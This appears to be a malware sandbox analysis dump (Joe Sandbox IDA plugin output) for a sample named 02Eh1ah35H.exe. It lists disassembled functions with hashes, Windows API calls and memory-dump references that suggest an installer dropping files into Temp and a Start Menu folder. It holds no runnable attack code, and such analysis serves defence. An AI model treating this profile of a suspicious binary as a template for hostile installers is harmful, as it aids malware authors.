                                                                                                                                                                                • Opcode ID: 3b2b3679bd27be8986a20790fb1aa9d433e7eb96043e8b231018ce36cdcb7856
                                                                                                                                                                                • Instruction ID: b1f28ea4fe1f397702134e154a5d50ad3aafc71d487b2ad51b946e19fd30fa70
                                                                                                                                                                                • Opcode Fuzzy Hash: 3b2b3679bd27be8986a20790fb1aa9d433e7eb96043e8b231018ce36cdcb7856
                                                                                                                                                                                • Instruction Fuzzy Hash: 3CF09672A00120ABDB10AFA89B4DAAE73B5AF45314F12443FF651B71C1DAFC5D01963E
                                                                                                                                                                                APIs
                                                                                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                                                                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Window$EnableShow
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1136574915-0
                                                                                                                                                                                • Opcode ID: a206bc09d31208a55ef0f8a5c470fd50e96019e1354e9f0dd429e4c405301b30
                                                                                                                                                                                • Instruction ID: a2c3742fa11dc5cf357e4fc2c1b39d3237f925362780464401897514ce5169fc
                                                                                                                                                                                • Opcode Fuzzy Hash: a206bc09d31208a55ef0f8a5c470fd50e96019e1354e9f0dd429e4c405301b30
                                                                                                                                                                                • Instruction Fuzzy Hash: 64E09A72A042009FD704EFA4AE488AEB3B4EB90325B20497FE401F20C1CBB85D00862E
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ShowWindow
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1268545403-0
                                                                                                                                                                                • Opcode ID: ed0fba548ae3e193f0e5ef583f5be9fd2d24872a13bb97bcc89e0a3ab6842b84
                                                                                                                                                                                • Instruction ID: b2fefa23d47a0510f6e3c17d58d1e446f1e854612225740054352d4863a47d08
                                                                                                                                                                                • Opcode Fuzzy Hash: ed0fba548ae3e193f0e5ef583f5be9fd2d24872a13bb97bcc89e0a3ab6842b84
                                                                                                                                                                                • Instruction Fuzzy Hash: 5CE0BF76B24114ABCB18DFA8ED90C6E77B6EB95310720847AE512B3690C679AD10CB68
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleA.KERNEL32(?,00000020,?,00403514,0000000B), ref: 004067F5
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00406810
                                                                                                                                                                                  • Part of subcall function 00406773: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040678A
                                                                                                                                                                                  • Part of subcall function 00406773: wsprintfW.USER32 ref: 004067C5
                                                                                                                                                                                  • Part of subcall function 00406773: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067D9
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2547128583-0
                                                                                                                                                                                • Opcode ID: 04b739db586b670126c7119b566f03dd1efc4ec82adb23a6bbf3e60323b3d7ce
                                                                                                                                                                                • Instruction ID: 99a4bc67a8c43757839ce5658996565e88f4cb2ecc15aeea03f34014f97f3c52
                                                                                                                                                                                • Opcode Fuzzy Hash: 04b739db586b670126c7119b566f03dd1efc4ec82adb23a6bbf3e60323b3d7ce
                                                                                                                                                                                • Instruction Fuzzy Hash: F2E0863350521056E611AA719D44C7773AC9F89650307843EF946F2080D738DC31ABBD
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\02Eh1ah35H.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405EE8
                                                                                                                                                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405F0A
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$AttributesCreate
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 415043291-0
                                                                                                                                                                                • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                                                                                                                • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                                                                                                                                                                • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                                                                                                                • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,?,00405AC4,?,?,00000000,00405C9A,?,?,?,?), ref: 00405EC4
                                                                                                                                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405ED8
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                                                                                • Instruction ID: 9f802252afbb128bb6d2778500f244350c46036787b5d1505cff2c7139ff2394
                                                                                                                                                                                • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                                                                                • Instruction Fuzzy Hash: 3CD0C9725055306BC2102728EE0C89BBB55EB64271B114A35F9A5A62B0CB304C528A98
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateDirectoryW.KERNELBASE(?,00000000,00403495,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 004059A8
                                                                                                                                                                                • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004059B6
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1375471231-0
                                                                                                                                                                                • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                                                                                                                • Instruction ID: 379133542b1e1e7011c0d69b4b2ae41cc98c6aec5a22f3063a42931ced3e53c7
                                                                                                                                                                                • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                                                                                                                • Instruction Fuzzy Hash: 1EC04C71205502EEF6115B20DF48B1B7A909B50751F16843DA146E01E4DE389455D92D
                                                                                                                                                                                APIs
                                                                                                                                                                                • ReadFile.KERNELBASE(00000000), ref: 6FDF2BB7
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28269523122.000000006FDF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FDF0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6fdf0000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                                • Opcode ID: 746a604a32e29519a3afe1ecae7054161731903295893cbb1287109d0e66a0d3
                                                                                                                                                                                • Instruction ID: 1e57cf8e3ece731a93be9f7334fd76afee1bf3d194d22544fe1c59885223e70a
                                                                                                                                                                                • Opcode Fuzzy Hash: 746a604a32e29519a3afe1ecae7054161731903295893cbb1287109d0e66a0d3
                                                                                                                                                                                • Instruction Fuzzy Hash: 6F418271403784EFEB609F68E981F5D3774EB0632EF26C426E805CA150C735B5929BA1
                                                                                                                                                                                APIs
                                                                                                                                                                                • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403457,00000000,00000000,0040329E,?,00000004,00000000,00000000,00000000), ref: 00405F7B
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                                • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                                                                                • Instruction ID: e146fa180a083be72d256ad1b428d57881e9eb39a1326beaade4420b40277b6a
                                                                                                                                                                                • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                                                                                • Instruction Fuzzy Hash: E7E0EC3221065BAFDF10AEA59C04EFB7B6CEB05360F004836FD55E6150D635E9219BA8
                                                                                                                                                                                APIs
                                                                                                                                                                                • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040340D,000000FF,00793700,?,00793700,?,?,00000004,00000000), ref: 00405FAA
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileWrite
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3934441357-0
                                                                                                                                                                                • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                                                                                • Instruction ID: df8aade711aef2fea4c6cc03ed90c08959c6261ddae8de931081f7d2433cde5f
                                                                                                                                                                                • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                                                                                • Instruction Fuzzy Hash: 96E08C3221021AEBDF109E608C00AEB7B6CEB00360F004433FA24E3150D634E8218BA8
                                                                                                                                                                                APIs
                                                                                                                                                                                • VirtualProtect.KERNELBASE(6FDF505C,00000004,00000040,6FDF504C), ref: 6FDF29FD
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28269523122.000000006FDF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FDF0000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28269495512.000000006FDF0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.28269551381.000000006FDF4000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.28269577474.000000006FDF6000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6fdf0000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                • Opcode ID: d1c9f9ea477fb4613738eb5072cc61f316acc676491786a20882d7e3f30952f7
                                                                                                                                                                                • Instruction ID: 9d6a8792725244baa83701b80d73e089065f4a1b4656b2d24ad47182c431065f
                                                                                                                                                                                • Opcode Fuzzy Hash: d1c9f9ea477fb4613738eb5072cc61f316acc676491786a20882d7e3f30952f7
                                                                                                                                                                                • Instruction Fuzzy Hash: 9BF092B1546A80EEEB90CF2CA444F093FE0B70A325F1AC52AE149D6240E3347169EB95
                                                                                                                                                                                APIs
                                                                                                                                                                                • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,007A0F28,?,?,004062E9,007A0F28,00000000,?,?,Call,?), ref: 0040627F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Open
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 71445658-0
                                                                                                                                                                                • Opcode ID: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                                                                                                                                                                • Instruction ID: 981b209bfbc59ad728c3152e24748ded8346fc425447e23afb42b8d85bc6dac1
                                                                                                                                                                                • Opcode Fuzzy Hash: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                                                                                                                                                                • Instruction Fuzzy Hash: 35D0123200020DBBDF11AF90ED05FAB372DAB08350F014426FE06A4091D775D530A728
                                                                                                                                                                                APIs
                                                                                                                                                                                • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043A2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                • Opcode ID: 749224e8f98fb78827d13f0d237c1790e640dc60b1af624d5aad8e7e956e5cea
                                                                                                                                                                                • Instruction ID: 2ab46fc48b107f7ec410a0490fc1e10939948660fe742cc14426a6f165494095
                                                                                                                                                                                • Opcode Fuzzy Hash: 749224e8f98fb78827d13f0d237c1790e640dc60b1af624d5aad8e7e956e5cea
                                                                                                                                                                                • Instruction Fuzzy Hash: 26C04C75784700BADA149B549E45F0677546B90701F158429B641A50D0CA78D410DA2C
                                                                                                                                                                                APIs
                                                                                                                                                                                • SetFilePointer.KERNELBASE(?,00000000,00000000,004031DA,?,?,00000007,00000009,0000000B), ref: 00403468
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FilePointer
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 973152223-0
                                                                                                                                                                                • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                                                                                                                • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                                                                                                                                                • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                                                                                                                • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                                                                                                                                                APIs
                                                                                                                                                                                • SendMessageW.USER32(00000028,?,00000001,004041A4), ref: 00404387
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                • Opcode ID: 33429e90f145919918c0f5a16300b6ae2cb664e9c61a266d81822a9c1fb78e21
                                                                                                                                                                                • Instruction ID: 9ccc480ae856a8f761d654a46a9a0801f91457f8e33b58f107ae6609e89c6df3
                                                                                                                                                                                • Opcode Fuzzy Hash: 33429e90f145919918c0f5a16300b6ae2cb664e9c61a266d81822a9c1fb78e21
                                                                                                                                                                                • Instruction Fuzzy Hash: 51B09235181A00AADE914B00DE09F457A62A7A4701F00C029B241240B4CAB200A4DB0A
                                                                                                                                                                                APIs
                                                                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,0040413D), ref: 00404370
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CallbackDispatcherUser
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2492992576-0
                                                                                                                                                                                • Opcode ID: fb2bbd85db119072699d8509dbb0c67ddc0fed6d182cd9e62e167e16add427de
                                                                                                                                                                                • Instruction ID: f32ebe17383345fd09930a0b12515434b8b37a693fa3d318b2a69664ac7713bd
                                                                                                                                                                                • Opcode Fuzzy Hash: fb2bbd85db119072699d8509dbb0c67ddc0fed6d182cd9e62e167e16add427de
                                                                                                                                                                                • Instruction Fuzzy Hash: 97A00176405540AFEE029B61EF09D4ABB72ABA9701B4185B9A286A0034CB364860EB1D
                                                                                                                                                                                APIs
                                                                                                                                                                                • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetDlgItem.USER32(?,000003FB), ref: 00404884
                                                                                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 004048AE
                                                                                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 0040495F
                                                                                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 0040496A
                                                                                                                                                                                • lstrcmpiW.KERNEL32(Call,007A1F48,00000000,?,?), ref: 0040499C
                                                                                                                                                                                • lstrcatW.KERNEL32(?,Call), ref: 004049A8
                                                                                                                                                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049BA
                                                                                                                                                                                  • Part of subcall function 00405A38: GetDlgItemTextW.USER32(?,?,00000400,004049F1), ref: 00405A4B
                                                                                                                                                                                  • Part of subcall function 0040669D: CharNextW.USER32(?,*?|<>/":,00000000,00000000,76F43420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\02Eh1ah35H.exe",0040347D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406700
                                                                                                                                                                                  • Part of subcall function 0040669D: CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040670F
                                                                                                                                                                                  • Part of subcall function 0040669D: CharNextW.USER32(?,00000000,76F43420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\02Eh1ah35H.exe",0040347D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406714
                                                                                                                                                                                  • Part of subcall function 0040669D: CharPrevW.USER32(?,?,76F43420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\02Eh1ah35H.exe",0040347D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406727
                                                                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(0079FF18,?,?,0000040F,?,0079FF18,0079FF18,?,00000001,0079FF18,?,?,000003FB,?), ref: 00404A7D
                                                                                                                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404A98
                                                                                                                                                                                  • Part of subcall function 00404BF1: lstrlenW.KERNEL32(007A1F48,007A1F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C92
                                                                                                                                                                                  • Part of subcall function 00404BF1: wsprintfW.USER32 ref: 00404C9B
                                                                                                                                                                                  • Part of subcall function 00404BF1: SetDlgItemTextW.USER32(?,007A1F48), ref: 00404CAE
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires$Call
                                                                                                                                                                                • API String ID: 2624150263-3018202500
                                                                                                                                                                                APIs
                                                                                                                                                                                • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402221
                                                                                                                                                                                Strings
                                                                                                                                                                                • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires, xrefs: 00402261
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateInstance
                                                                                                                                                                                • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires
                                                                                                                                                                                • API String ID: 542301482-3207577588
                                                                                                                                                                                APIs
                                                                                                                                                                                • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402911
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileFindFirst
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1974802433-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404DC8
                                                                                                                                                                                • GetDlgItem.USER32(?,00000408), ref: 00404DD5
                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E21
                                                                                                                                                                                • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404E38
                                                                                                                                                                                • SetWindowLongW.USER32(?,000000FC,004053CA), ref: 00404E52
                                                                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E66
                                                                                                                                                                                • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404E7A
                                                                                                                                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404E8F
                                                                                                                                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404E9B
                                                                                                                                                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EAD
                                                                                                                                                                                • DeleteObject.GDI32(00000110), ref: 00404EB2
                                                                                                                                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EDD
                                                                                                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EE9
                                                                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F84
                                                                                                                                                                                • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404FB4
                                                                                                                                                                                  • Part of subcall function 00404379: SendMessageW.USER32(00000028,?,00000001,004041A4), ref: 00404387
                                                                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FC8
                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404FF6
                                                                                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405004
                                                                                                                                                                                • ShowWindow.USER32(?,00000005), ref: 00405014
                                                                                                                                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405115
                                                                                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405177
                                                                                                                                                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040518C
                                                                                                                                                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B0
                                                                                                                                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D3
                                                                                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 004051E8
                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 004051F8
                                                                                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405271
                                                                                                                                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 0040531A
                                                                                                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405329
                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00405353
